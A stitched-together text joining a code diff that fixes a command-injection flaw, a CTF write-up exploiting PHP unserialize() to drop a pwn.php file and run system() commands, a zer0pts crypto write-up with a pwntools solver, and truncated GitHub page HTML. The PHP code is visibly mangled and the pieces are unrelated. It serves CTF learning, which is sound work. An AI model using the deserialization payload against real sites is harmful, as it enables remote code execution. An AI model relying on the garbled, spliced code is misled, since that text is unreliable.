2020-03-06 21:58:20.985470271 +0000@@ -9,6 +9,7 @@ import os import random import hashlib+import pipes banner = ''' __ __ _ _ _____ _ _ @@ -90,10 +91,10 @@ key_id, cmd_f, cmd_kf, sig_f, sig_kf = token.split('|') with open('signer_%s.key' % key_id) as f: key = RSA.importKey(f.read()) if not verify(key, cmd_f, sig_f) or not verify(key, cmd_kf, sig_kf): raise Exception('Invalid signature')- cmd_f = base64.b64decode(cmd_f)- cmd_kf = base64.b64decode(cmd_kf)- with os.popen(cmd_f) as f: ciphertext = f.read()- with os.popen(cmd_kf) as f: data_key = f.read()+ cmd_f = base64.b64decode(cmd_f).split(' ', 1)+ cmd_kf = base64.b64decode(cmd_kf).split(' ', 1)+ with os.popen('cat ' + pipes.quote(cmd_f[1])) as f: ciphertext = f.read()+ with os.popen('cat ' + pipes.quote(cmd_kf[1])) as f: data_key = f.read() cipher = AES.new(data_key, AES.MODE_CBC, '\x00' * 16) plaintext = cipher.decrypt(ciphertext) print('Hey. This is your secret:')```
# Cereal and Milk Thank you to `N1z0ku` and `NightWolf` (the author) for their hints :) ## The brief ```What do you like for breakfast? Cereal and milk is my favorite.Sometimes, it tastes a bit odd though.``` ## Looking at the source code In `index.php`:```php Coming soon."; # echo print_r($output); } public function cereal_and_milk() { echo $this->cereal . " is the best cereal btw."; } } $input = $_POST['serdata'];$output = unserialize($input); $app = new CerealAndMilk;$app -> cereal_and_milk($output); ?>```Our data is sent as post data, then deserialized and used as the new `CerealAndMilk` object. Alrigh, what about `log.php`:```phplogs , "a"); fwrite($request_log, $this->request); fwrite($request_log, "\r\n"); fclose($request_log); }} ?>```the `log` has only a `__destruct()` function, which is called when an object is deserialized. What happens is, it opens the `logs` file that is provided in `append` mode and appends the `request` that was provided. So what do we actually have to do? Create a serialized object, input that and get code execution. Don't believe me? You'll see. ## Payload The payload may be generated using php code:```phplogs = "pwn.php"; $this->request = ""; $this->cereal = "Frosties"; $this->milk = "full"; } } $cer = new CerealAndMilk();echo serialize($cer);echo "\n";?>```But this payload doesn't work, how can we make it better? Well two things. I changed the `log.php` code and made sure for `fast deserialization` to happen, using arrays.`log.php````phplogs='pwn.php'; $this->request=''; } public function __destruct() { $request_log = fopen($this->logs , "a"); fwrite($request_log, $this->request); fwrite($request_log, "\r\n"); fclose($request_log); }} ?>```And the `payload.php` code:```phplog[0] = new log(); $this->cereal[0] = 'Frosties'; $this->milk[0] = 'full'; $this->log[1] = new log(); $this->cereal[1] = 'Frosties'; $this->milk[1] = 'full'; } } $cer = new CerealAndMilk();echo serialize($cer);echo "\n"; ?>```And the output:```O:13:"CerealAndMilk":3:{s:3:"log";a:2:{i:0;O:3:"log":2:{s:4:"logs";s:7:"pwn.php";s:7:"request";s:27:"";}i:1;O:3:"log":2:{s:4:"logs";s:7:"pwn.php";s:7:"request";s:27:"";}}s:6:"cereal";a:2:{i:0;s:8:"Frosties";i:1;s:8:"Frosties";}s:4:"milk";a:2:{i:0;s:4:"full";i:1;s:4:"full";}```Now another quirk, do not copy the last `}`. There should be only one at the end. Now to see if it works, input it and then navigate to `/pwn.php`: ![listing](./listing.png) Great! That one directory looks strange, just change the `system()` command to `cat ndwbr7pVKNCrhs-CerealnMilk/flag.txt` and here we go!: The payload `O:13:"CerealAndMilk":3:{s:3:"log";a:2:{i:0;O:3:"log":2:{s:4:"logs";s:7:"pwn.php";s:7:"request";s:59:"";}i:1;O:3:"log":2:{s:4:"logs";s:7:"pwn.php";s:7:"request";s:59:"";}}s:6:"cereal";a:2:{i:0;s:8:"Frosties";i:1;s:8:"Frosties";}s:4:"milk";a:2:{i:0;s:4:"full";i:1;s:4:"full";}` ![flag](./flag.png) Amazing! We have the flag :)
# janken vs yoshiking **Category**: Crypto \**Points**: 143 (44 solves) \**Author**: theoldmoon0602 ## Challenge Yoshiking knows the flag. He will give the flag to who has gold luck. Let's playthe janken with Yoshiking and prove your luck! `nc crypto.ctf.zer0pts.com 10463` Attachments: `janken_vs_yoshiking.tar.gz` ## Solution Here's the challenge:```pythonimport randomimport signalfrom flag import flagfrom Crypto.Util.number import getStrongPrime, inverse HANDNAMES = { 1: "Rock", 2: "Scissors", 3: "Paper"} def commit(m, key): (g, p), (x, _) = key r = random.randint(2, p-1) c1 = pow(g, r, p) c2 = m * pow(g, r*x, p) % p return (c1, c2) def decrypt(c, key): c1, c2 = c _, (x, p)= key m = c2 * inverse(pow(c1, x, p), p) % p return m def keygen(size): p = getStrongPrime(size) g = random.randint(2, p-1) x = random.randint(2, p-1) return (g, p), (x, p) signal.alarm(3600)key = keygen(1024)(g, p), _ = keyprint("[yoshiking]: Hello! Let's play Janken(RPS)")print("[yoshiking]: Here is g: {}, and p: {}".format(g, p)) round = 0wins = 0while True: round += 1 print("[system]: ROUND {}".format(round)) yoshiking_hand = random.randint(1, 3) c = commit(yoshiking_hand, key) print("[yoshiking]: my commitment is={}".format(c)) hand = input("[system]: your hand(1-3): ") print("") try: hand = int(hand) if not (1 <= hand <= 3): raise ValueError() except ValueError: print("[yoshiking]: Ohhhhhhhhhhhhhhhh no! :(") exit() yoshiking_hand = decrypt(c, key) print("[yoshiking]: My hand is ... {}".format(HANDNAMES[yoshiking_hand])) print("[yoshiking]: Your hand is ... {}".format(HANDNAMES[hand])) result = (yoshiking_hand - hand + 3) % 3 if result == 0: print("[yoshiking]: Draw, draw, draw!!!") elif result == 1: print("[yoshiking]: Yo! You win!!! Ho!") wins += 1 print("[system]: wins: {}".format(wins)) if wins >= 100: break elif result == 2: print("[yoshiking]: Ahahahaha! I'm the winnnnnnner!!!!") print("[yoshiking]: You, good loser!") print("[system]: you can check that yoshiking doesn't cheat") print("[system]: here's the private key: {}".format(key[1][0])) exit() print("[yoshiking]: Wow! You are the king of roshambo!")print("[yoshiking]: suge- flag ageru")print(flag)``` Ok cool, let's try playing:```$ nc crypto.ctf.zer0pts.com 10463[yoshiking]: Hello! Let's play Janken(RPS)[yoshiking]: Here is g: 93246466493691290620182341454221633182460738434093815614077634080811517316341693745452680006974397748549073183117736391520888357272614864106181802187021183835474370489602909536063062232676255474901456464530906809271865057165340499683065369727180882086646017049438362596410504704204860951104447125103398714724, and p: 175260510573199640037642339820283538897541297874737572855697757265705383191213854343948586106190401497192681772568271208606712764847196343016562688822513491034608107038867961034265033527052343132581506482292841372716055224460126927165986190540381376918906475686409173155989992550341788186503659560888692515471[system]: ROUND 1[yoshiking]: my commitment is=(112651872829754024283473409318843778681638126351770042582374400478440525882886726719756618379935417439904071214109877213367442204160375946345454767709109803229236401357963557510315011234912272481048752200427546337153367523061616451042946744469337075954710436426439652334987967376487425331704233306024655105176, 115245909685214127944207618842326314178160285396719345903403728951651310138928930238377788066374467272423096900457550327395478903539795679566608658438289761945940485296317857085518101487728973674459127879074084185532790425810710996037585628864608127918624790524605037353276382371539473645236236933680909482701)[system]: your hand(1-3): 1 [yoshiking]: My hand is ... Scissors[yoshiking]: Your hand is ... Rock[yoshiking]: Yo! You win!!! Ho![system]: wins: 1[system]: ROUND 2[yoshiking]: my commitment is=(161403278591040354605417036011896951435134275207122273129458056487290363740948660606229221525160025068245437176171796581510885742819286478423908399887420750642822138770465844085806830129108172249919419369892417952381609714792030850041269560520979904064951433491793355600089020675980462504700892374092872950002, 92715687382822328798263887951852472168705583088419371689873971982065659870782921182332562059144193113377771897365564067387318554789009354400379903941568475701306865902660861859832518436661644938305251862797437660152585947595604457533665840102936250016674173358362720153964609438763516488467077157766086764564)[system]: your hand(1-3): 2 [yoshiking]: My hand is ... Scissors[yoshiking]: Your hand is ... Scissors[yoshiking]: Draw, draw, draw!!![system]: ROUND 3[yoshiking]: my commitment is=(162648139983079039210429983992623031636987459728763727233622096497635372303027173615732409588355323020966239590464490063815748578967233983434270795501590768933949445098071710642727266259389395766655769999516542485629442587738235298651085427923008449646529019430628498677842888872941279221981837513128334531096, 142848696422881868056551200689837064864660889473467350378995958190417128882419210201110373735508636775322371867419985699588028425792545024113316008697817062844624119711500249828738416381927190489065357183025698362852535365166470686627594277018931077962239541743836289607729514802886672509183557913570493069143)[system]: your hand(1-3): 2 [yoshiking]: My hand is ... Scissors[yoshiking]: Your hand is ... Paper[yoshiking]: Ahahahaha! I'm the winnnnnnner!!!![yoshiking]: You, good loser![system]: you can check that yoshiking doesn't cheat[system]: here's the private key: 64374958372873310433110749433773684872150993622043711610669809604637278767761286233154066185796824212804867670985223698719896990586340990462229819212484386522137010301983420276730792959563081181574872642810981970937405142279352548848302624141126634775271664453741169343121168240221765094331538329803386574402``` So all we have to do is win 100 rounds of rock paper scissors. On each round,they give us two ciphertexts (`c1` and `c2`) that encrypt yoshiking's hand,which could be either 1 (rock), 2 (scissors), or 3 (paper). This challenge seems to use a home-rolled cryptosystem based on Diffie-Hellmanover the multiplicative group modulo a prime. We're given a strong prime `p` and a generator `g`. There is also a private `x`,but we don't know its value:```pythondef keygen(size): p = getStrongPrime(size) g = random.randint(2, p-1) x = random.randint(2, p-1) return (g, p), (x, p)``` Next, the encryption picks a random `r`, which serves as an obscuring factor.Then we're given `g^r` and `m * g^(rx)`.```pythondef commit(m, key): (g, p), (x, _) = key r = random.randint(2, p-1) c1 = pow(g, r, p) c2 = m * pow(g, r*x, p) % p return (c1, c2)``` Due to the hardness of the discrete logarithm problem, we can't compute `r` or`r * x`. Finally, the decryption step is like this:```m === c2 / c1^xm === m * g^(rx) / g^(rx)m === m```In code:```pythondef decrypt(c, key): c1, c2 = c _, (x, p)= key m = c2 * inverse(pow(c1, x, p), p) % p return m``` How can we attack this?- Since `p` is a strong prime, attacks like Pohlig-Hellman won't work.- As mentioned earlier, even when we know `g`, `g^r`, and `g^(rx)`, we can't calculate `r` or `x` However, since `m` can only be 1, 2, 3, maybe we don't need a full break of thecryptosystem to find `m`. In the end, it boils down to being able to distinguishbetween these values:```c2 === 1 * g^(rx)c2 === 2 * g^(rx)c2 === 3 * g^(rx)``` This reminds me of the Decisional Diffie-Hellman assumption. After some quickgoogling, it turns out that the DDH assumption **doesn't** hold in amultiplicative group modulo a prime. Why is this? Some quick background on quadratic residues (also check out the relatedchallenges on Cryptohack): We say `a` is a quadratic residue if there's some `r` such that`r^2 === a (mod p)`. So basically, a quadratic residue is like a perfect square`mod p`. Also:```Abbreviate QR as any quadratic residue QR * QR = QR!QR * QR = !QR!QR * !QR = QR``` Going back to the problem, let's say `g` is a QR. Then `g^anything` is also aQR. This means `g^(rx)` will also be a QR. We know that `1` is always a QR because `1^2 === 1`. But `2` and `3` may or maynot be a QR depending on the value of `p`. Let's say we get a `p` so that:```1 is a QR (always true)2 is a QR3 is not a QR```> Note that we can reconnect to the challenge server until the constraints are> satisfied Then:```if m == 1: m * g^(rx) is a QRif m == 2: m * g^(rx) is a QRif m == 3: m * g^(rx) is not a QR``` How can we check if something is a QR? Use the Legendre symbol, which canbe computed efficiently in Sage: `legendre_symbol(c2, p)` Finally we can narrow down the value of `m` like so:```pythonif legendre_symbol(c2, p) == -1: return 3else: # m is either 1 or 2 pass``` At this point, I was stuck for many hours. I tried all kinds of weird stuff todistinguish between `m = 1` and `m = 2`, but couldn't find anything. Then Irealized that we actually *don't need to know* which one it is. Remember that 1 is rock and 2 is scissors. If we always pick rock, then we canat least force a tie and the game will continue. Since we just need to get 100wins in total, this works fine: ```pythonif legendre_symbol(c2, p) == -1: return 3else: return 1 # Always pick rock``` Here's my complete script:```pythonimport pwn pwn.context.log_level = "debug" while True: io = pwn.remote("crypto.ctf.zer0pts.com", 10463) io.recvline() s = io.recvlineS() g, p = s.split(", and p: ") p, g = int(p), int(g[24:]) if ( legendre_symbol(g, p) == 1 and legendre_symbol(2, p) == 1 and legendre_symbol(3, p) == -1 ): break print("Bad params, trying again") print("Good pararms, starting exploit") while True: io.recvuntilS("ROUND") io.recvline() s = io.recvlineS().strip()[31:-1] c1, c2 = s.split(", ") c1, c2 = int(c1), int(c2) """ If the Legendre symbol is 1, it could either be 1 or 2. To force at least a tie, we always pick rock, which is 1 """ hand = 3 if legendre_symbol(c2, p) == -1 else 1 io.sendlineafter("your hand(1-3):", str(hand))``` Output:```Programs/zer0pts/janken_vs_yoshiking via ? system pypy3.6-7.3.1 took 3s$ export PWNLIB_NOTERM=true Programs/zer0pts/janken_vs_yoshiking via ? system pypy3.6-7.3.1$ sage solve.sage... [x] Opening connection to crypto.ctf.zer0pts.com on port 10463[x] Opening connection to crypto.ctf.zer0pts.com on port 10463: Trying 64.225.59.76[+] Opening connection to crypto.ctf.zer0pts.com on port 10463: Done[DEBUG] Received 0x56f bytes: b"[yoshiking]: Hello! Let's play Janken(RPS)\n" b'[yoshiking]: Here is g: 27821288031048497638040321441366934402724241867733654609380781519468353894312417097558338110815488446613855400848537707468325667521630064599131559919833907679336706983542547273990287177437490768527036635999298397143799087556049157481559053044527183876583934571600294562255172304210687393455444302548344965470, and p: 172213679200640475128065574192234498162317672997499408733466713668251680583340186760366499313486259038211444377830415417639625172925417500734119787733829027451993598051891138886718674789089506190579227639115200070868855462262418492102838187040511473038871997795416404535679247404826356931586745254973940694393\n' b'[system]: ROUND 1\n' b'[yoshiking]: my commitment is=(135081827361253404849814915454970728803287011764857593540436872647517872687567775396260287309814396550048127643570792587256050352163472479008941618270029167057027463845895040440226651269682499075274210084634022867564907374626771094067343048934111093491179344904537064388501918111915266345787669882762802342350, 117918766543864138696691444590790837016368372195220384335013229323468908058694465600257012838898418078284227914033083303949616340550650516247974706600033205227567049599341941233205343299865609196471862459839816610126285451743661621916524574399613123036452588181979518595221326190096230502188765423777108041373)\n' b'[system]: your hand(1-3): 'Good pararms, starting exploit[DEBUG] Sent 0x2 bytes: b'3\n'[DEBUG] Received 0x31f bytes: b'\n' b'[yoshiking]: My hand is ... Paper\n' b'[yoshiking]: Your hand is ... Paper\n' b'[yoshiking]: Draw, draw, draw!!!\n' b'[system]: ROUND 2\n' b'[yoshiking]: my commitment is=(66097170599603837124408025796041420612172170016417766439322589406251220607607606618199130438397156788523698275684290687812305710292459903024381750962760374863853729860562932795087534045977337142210527665114500393562590498678982081477613351650505102439355335127571090278928719937416606635306067892154710742342, 53766246218487733953260208431534217882490092303030889377893359820682129218770573761152275624076887624220962973988189548819149515209256292105064150406819326418637748116691815739378316236354408924343610515277471279772317788566928046510521283861391766659983117893802066432579531575617852175352548159764791124894)\n' ... b'[system]: your hand(1-3): '[DEBUG] Sent 0x2 bytes: b'1\n'[DEBUG] Received 0xf2 bytes: b'\n' b'[yoshiking]: My hand is ... Scissors\n' b'[yoshiking]: Your hand is ... Rock\n' b'[yoshiking]: Yo! You win!!! Ho!\n' b'[system]: wins: 100\n' b'[yoshiking]: Wow! You are the king of roshambo!\n' b'[yoshiking]: suge- flag ageru\n' b'zer0pts{jank3n-jank3n-0ne-m0r3-batt13}\n'Traceback (most recent call last): File "solve.sage.py", line 30, in <module> io.recvuntilS("ROUND") File "/home/plushie/Programs/archive/pwntools/pwnlib/tubes/tube.py", line 1379, in wrapperS return context._decode(func(self, *a, **kw)) File "/home/plushie/Programs/archive/pwntools/pwnlib/tubes/tube.py", line 310, in recvuntil res = self.recv(timeout=self.timeout) File "/home/plushie/Programs/archive/pwntools/pwnlib/tubes/tube.py", line 82, in recv return self._recv(numb, timeout) or b'' File "/home/plushie/Programs/archive/pwntools/pwnlib/tubes/tube.py", line 160, in _recv if not self.buffer and not self._fillbuffer(timeout): File "/home/plushie/Programs/archive/pwntools/pwnlib/tubes/tube.py", line 131, in _fillbuffer data = self.recv_raw(self.buffer.get_fill_size()) File "/home/plushie/Programs/archive/pwntools/pwnlib/tubes/sock.py", line 56, in recv_raw raise EOFErrorEOFError```
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" /> <script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Gr3ZcJt5t73JeBM3NwOEziKyDZ3HpHwzqZL/c1pgTUfo+6QC5f88XXRw/RT6X2diwqvaa3OVFh0oWsZ9ZxhtdQ==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-1abdd970.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EdQvlnI4Pu5Q6K0HCvp+mi0Vw9ZuwaEuhbnCbmFKX+c0xwiUWY0L3n9P0F6doLhaHhfpvW3718+miL11WG4BeA==" type="application/javascript" data-module-id="./chunk-line.js" data-src="https://github.githubassets.com/assets/chunk-line-11d42f96.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4zSHP2sQXPKoN9jFy8q2ThHsQNej8s4qhubSR4g0/2dTexAEnoTG+RbaffdIhmjfghGjpS/DlE0cdSTFEOcipQ==" type="application/javascript" data-module-id="./chunk-array.js" data-src="https://github.githubassets.com/assets/chunk-array-e334873f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-g8fb6U7h9SkWgiK69nfNMn4aN5D2YBYPZUbCIuLpemWoOw8NOaZY8Z0hPq4RUVs4+bYdCFR6K719k8lwFeUijg==" type="application/javascript" data-module-id="./chunk-band.js" data-src="https://github.githubassets.com/assets/chunk-band-83c7dbe9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6oWCu7ltWLHlroIRg8mR6RloC1wqKS9aK9e5THWgzaE2GNPAdoC+MLZEYD/TdIiZxsQRev0RInyonsXGBK0aMw==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-ea8582bb.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-miaiZ1xkDsWBUsURHOmeYtbgVKQGnm1octCo/lDXUmPzDyjtubnHULRVw1AK+sttwdwyB0+LOyhIVAWCNSGx+A==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-9a26a267.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GD25CNhMGDMzEmeFhUT0FILBupAkx5/CHohnYXOP1togy40O0iu/lASaSp3gV8ue0nwscalJVQqR5gKDRHHDVg==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-183db908.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4vVRplWFI7P4m3RHQ0QAhkq6eZUdtIE8PBhsKYJRwDkhQw9iK/U1st1/fM1tQZFuBFwGMyqaZblbWtQ+2ejcqQ==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-e2f551a6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ofk7ddnMsJ6F9d2vCuPQav+FG9Rg8i6WRG2KmbzwT01S9H4y58Fl42zYxDh/lJjOWeSyOB9KJyfIkdpCCTYG9A==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-39f93b75.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vFR+IqThljOLrAWmjhOL/kiQrjgZZg95uPovX0J7kRH5p7Y049LDRZaXLMDijfeqqk71d3MMn9XP5bUcH+lB9w==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-bc547e22.js"></script> <script crossorigin="anonymous" 